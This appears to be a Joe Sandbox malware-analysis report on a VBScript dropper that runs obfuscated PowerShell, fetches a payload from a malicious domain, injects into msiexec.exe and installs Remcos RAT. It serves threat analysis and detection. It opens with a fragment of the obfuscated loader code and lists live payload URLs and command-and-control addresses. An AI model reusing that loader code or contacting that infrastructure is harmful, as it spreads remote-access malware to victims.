entkunive gy.lkri i oveztermalykktindbifusioetikn lep.k.nfckrels no.v';$samariteruddannelse=exposes 'nids>';$hesperornithid=exposes ' ineistrue oncx';$arbejdstilbud216='delelejligheds';$stenvindenes49='\huguenotism.bed';nonprecipitation225 (exposes ' sac$bikagbondlthe 
o,onob mpea bellupsl:ileomthomoletmdsubfeev lnfunkharkie nrdi peeseksrord nbolseumedst,as= kl.$ inkerefrndeutvd hy:lollata np utpl dddadelafod tb tuap,ja+plag$mokesadretpr aenvernhovevinfri sannchacdkroee coon kamenon sconc4 cap9');nonprecipitation225 (exposes 'non $ tecgrentlkuldonondbbe aafiskl und:ko,en oesa.orhrfi ucsmudodepas hydim losilio=hove$crosr opnisupedtilsatereb nonlide e m snforsekanasinkustra .dic,sbolip neflhemairifft ou ( v r$falds coha varmprivaoutwranneisto t apteh,emrmoruucystd ildbilba monntinsnk.ateloselmed sclime rip)');nonprecipitation225 (exposes $gevandterne);$ridableness=$narcosis[0];$fike=(exposes ' hom$ganggdisclgensos ngb magaeth l.ord:strotperivraadinovis fort.ikreroerpdipoudavinirrekcaritbambe,pittung saden=encyn chaeafbewskaa-drifo manbsub.jbredebaylck,tttnone tessbyggyr glschaut levefdsemsoci.real$forsutidsnind dvltee culrt,laemillkdiscsindst bssrultieginnmsmali,orvtrecae .iltbesvelinin');nonprecipitation225 ($fike);nonprecipitation225 (exposes ' f r$r.ilt,eskv arti rosssp nto eredonopinf,u
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match, File source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7K8JAD
Source: Yara match, File source: 0000000D.00000002.2546894323.00000000069CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7768, type: MEMORYSTR
MITRE ATT&CK matrix (one row per matrix row; the number(s) before a technique name are the badge counts shown on the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | 113 Application Layer Protocol | Data Transfer Size Limits | Service Stop
Behavior Graph (ID: 1573519, Sample: Strait STS.vbs, Start date: 12/12/2024, Architecture: WINDOWS, Score: 100)
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
Contacted domain: of1x.icu
wscript.exe (started): VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
    -> powershell.exe (started): of1x.icu 172.67.216.143, ports 443, 49699, 49776, CLOUDFLARENETUS, United States; Found suspicious powershell code related to unpacking or dynamic code loading
        -> conhost.exe (started)
powershell.exe (started): Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
    -> msiexec.exe (started): 154.216.18.216, ports 2404, 49786, 49841, SKHT-ASShenzhenKatherineHengTechnologyInformationCo, Seychelles; Detected Remcos RAT
    -> conhost.exe (started)

Source | Detection | Scanner | Label
Strait STS.vbs | 0% | ReversingLabs |

No Antivirus matches (dropped files)
No Antivirus matches (unpacked files)

Source | Detection | Scanner | Label
of1x.icu | 1% | Virustotal |

Source | Detection | Scanner | Label
https://of1x.icu/rxHEjEYE/Nickelization.csv | 2% | Virustotal |
http://crl.microsk | 0% | Avira URL Cloud | safe
https://of1x.icu/ | 0% | Avira URL Cloud | safe
https://of1x.icu/rxHEjEYE/Nickelization.csvP | 0% | Avira URL Cloud | safe
https://of1x.icu/rxHEjEYE/Nickelization.csv | 0% | Avira URL Cloud | safe
https://of1x.icu | 0% | Avira URL Cloud | safe
http://crl.microsoft.H | 0% | Avira URL Cloud | safe
https://of1x.icu/rxHEjEYE/Nickelization.csvXR | 0% | Avira URL Cloud | safe
http://of1x.icu | 0% | Avira URL Cloud | safe
https://of1x.icu/ | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
of1x.icu | 172.67.216.143 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://of1x.icu/rxHEjEYE/Nickelization.csv | false | 2%, Virustotal; Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://of1x.icu/ | msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.1365512163.000002910133D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsk | msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://of1x.icu/rxHEjEYE/Nickelization.csvP | powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://of1x.icu | powershell.exe, 00000002.00000002.1365512163.0000029101BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1365512163.0000029100226000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.1593326524.000000000602B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft.H | msiexec.exe, 0000000D.00000002.2546894323.00000000069FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1716544458.0000000006A01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1365512163.0000029100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1572573596.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://of1x.icu | powershell.exe, 00000002.00000002.1365512163.0000029101C8B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://of1x.icu/rxHEjEYE/Nickelization.csvXR | powershell.exe, 0000000A.00000002.1572573596.0000000005119000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.216.143 | of1x.icu | United States | 13335 | CLOUDFLARENETUS | false
154.216.18.216 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573519
Start date and time: 2024-12-12 07:53:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Strait STS.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@8/7@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 79%
• Number of executed functions: 39
• Number of non-executed functions: 18
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2356 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:54:08 | API Interceptor | 88x Sleep call for process: powershell.exe modified
03:49:25 | API Interceptor | 431681x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
154.216.18.216 | DT RDU KDFT0089.exe | malicious | Remcos |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
of1x.icu | Reqt 83291.vbs | malicious | Remcos, GuLoader | 104.21.86.72

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Captcha.hta | malicious | Cobalt Strike, HTMLPhisher, LummaC Stealer | 172.67.206.64
 | malware.ps1 | malicious | MassLogger RAT | 104.21.67.152
 | https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobs | malicious | Captcha Phish | 104.21.80.1
 | https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/0af634fca2eaf3a11c0597691f5616c7d16f5580d650d17201024b374ebe92a8e0c492c822b6be6f4332bb93acc2ba02298f78/christa_sgobba@condenast.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobs | malicious | Captcha Phish, HTMLPhisher | 172.67.157.142
 | REMITTANCE_10023Tdcj.html | malicious | Unknown | 104.17.25.14
 | phish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.eml | malicious | Unknown | 104.17.25.14
 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 172.67.176.240
 | jew.ppc.elf | malicious | Unknown | 104.16.155.85
 | Shipping Documents.exe | malicious | MassLogger RAT | 104.21.67.152
 | https://newdocumentsproposal.webflow.io/ | malicious | Captcha Phish, HTMLPhisher | 172.64.151.8
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | mips.elf | malicious | Mirai | 156.226.9.180
 | https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3D | malicious | Phisher | 154.216.20.188
 | Reqt 83291.vbs | malicious | Remcos, GuLoader | 154.216.18.62
 | RH74mYjwoQ.elf | malicious | Mirai | 154.216.16.109
 | tgCdafZIfZ.elf | malicious | Mirai | 154.216.16.109
 | LiUgL2AoGI.elf | malicious | Mirai | 154.216.16.109
 | hax.mpsl.elf | malicious | Mirai | 156.230.19.183
 | 16RIueF7yh.elf | malicious | Mirai | 154.216.16.109
 | https://listafrica.org/Receipt.html | malicious | WinSearchAbuse | 154.216.17.175
 | nshppc.elf | malicious | Mirai | 156.241.11.54
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Shipping Documents.exe | malicious | MassLogger RAT | 172.67.216.143
 | https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwE | malicious | PureLog Stealer | 172.67.216.143
 | https://owotabua.cloudfederalservices.com/F3A4k | malicious | Unknown | 172.67.216.143
 | https://securee103.z13.web.core.windows.net/winside/00Windbndktw0win11advance/index.html# | malicious | TechSupportScam | 172.67.216.143
 | c2.hta | malicious | XWorm | 172.67.216.143
 | Agreement ATT Confidential -16_08_52-{DATE).docx | malicious | Unknown | 172.67.216.143
 | T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.216.143
 | wi86CSarYC.exe | malicious | DanaBot | 172.67.216.143
 | wi86CSarYC.exe | malicious | DanaBot | 172.67.216.143
 | 37f463bf4616ecd445d4a1937da06e19c2.hta | malicious | XWorm | 172.67.216.143
 | peks66Iy06.exe | malicious | Unknown | 172.67.216.143
 | XXHYneydvF.exe | malicious | Unknown | 172.67.216.143
 | nt11qTrX4f.exe | malicious | Unknown | 172.67.216.143
 | otsIBG7J9b.exe | malicious | Unknown | 172.67.216.143
 | XgijTrY6No.exe | malicious | Unknown | 172.67.216.143
 | nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta | malicious | Cobalt Strike, Remcos | 172.67.216.143
 | CcIlKT6XdC.exe | malicious | Amadey, PureLog Stealer, Stealc, Vidar | 172.67.216.143
 | PO_11100011211.Vbs.vbs | malicious | FormBook | 172.67.216.143
 | Reqt 83291.vbs | malicious | Remcos, GuLoader | 172.67.216.143
                                        No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 8003
Entropy (8bit): 4.840877972214509
Encrypted: false
SSDEEP: 192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5: 106D01F562D751E62B702803895E93E0
SHA1: CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256: 6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512: 81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                        MD5:DA1F22117B9766A1F0220503765A5BA5
                                        SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                        SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                        SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e.................................R..............@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                        Category:dropped
                                        Size (bytes):477528
                                        Entropy (8bit):5.946387611522241
                                        Encrypted:false
                                        SSDEEP:6144:XPg5EPAxyFahCnshuOZa/ifaSTJLdwB1TO+vCTPtvjjWfp88+G1w/Cmg393P:/gXyFsu/vxFOFNjip8n0XNP
                                        MD5:B26527026F5A26ED7BABDDB7E8D8B340
                                        SHA1:773235C6FA1CCB738DB217FE387259C8C4F70C79
                                        SHA-256:4F558A98BCBEA1F90ED0F74003698909DCAE021CCF2550F0309A7242F8CA7054
                                        SHA-512:A1A8715881D3E06D7C5D4F1AE552894F811591C0E3BEB0CAA602CFAEA957F67DA7FF3850EBD16B31443AAD6455F2CC12CB176A0A99C03608806113CF8F0A971A
                                        Malicious:false
Preview:
                                        File type:ASCII text, with very long lines (347), with CRLF line terminators
                                        Entropy (8bit):4.971558176602615
                                        TrID:
                                          File name:Strait STS.vbs
                                          File size:64'296 bytes
                                          MD5:e6c71bbe4f758fb7c79ac21e9c514977
                                          SHA1:8a491650c20b51b8ccaeb4d76464b01ab1f15ef7
                                          SHA256:96e58c4ebcebd2972a1f50671fe2c43a89caa4c078767952ddcade51985d4a3f
                                          SHA512:e2bc84942acdf9af4afac209f6d3950572eb6eb595e4720cbd3f24e1906a204e4e3fe6867d9d7ecb54166154b5c753662b017c52e3b50c3e38df93bb1c70a59a
                                          SSDEEP:1536:Ddt+UfF7Uvx4GHZg40xnsg07lyODovbB1sRirf5:5MUdq4GGJxszCvbBcirx
                                          TLSH:28535AA3EF65064B0D8E2799FD651F06C5BCC108552769F6FEE9074DA00A89CB3BE20D
                                          File Content Preview:..'Billedlotterierne: haircut kuldsejles! henstilledes antitoksinet..'Remerging journaliseringsfunktionens, unsaint? udforskningerne;..'Sends! eppy. lovgennemgangs,..'Undervisningsmateriellers! sensibiliseret! guldgrubernes. helsingborgs. chefforhandlerne
                                          Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T07:54:02.268298+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49946 | 154.216.18.216 | 2404 | TCP
2024-12-12T07:54:52.755878+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.7 | 49776 | 172.67.216.143 | 443 | TCP
2024-12-12T07:55:17.429700+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49786 | 154.216.18.216 | 2404 | TCP
2024-12-12T07:55:40.476958+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49841 | 154.216.18.216 | 2404 | TCP
2024-12-12T07:56:03.524506+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49894 | 154.216.18.216 | 2404 | TCP
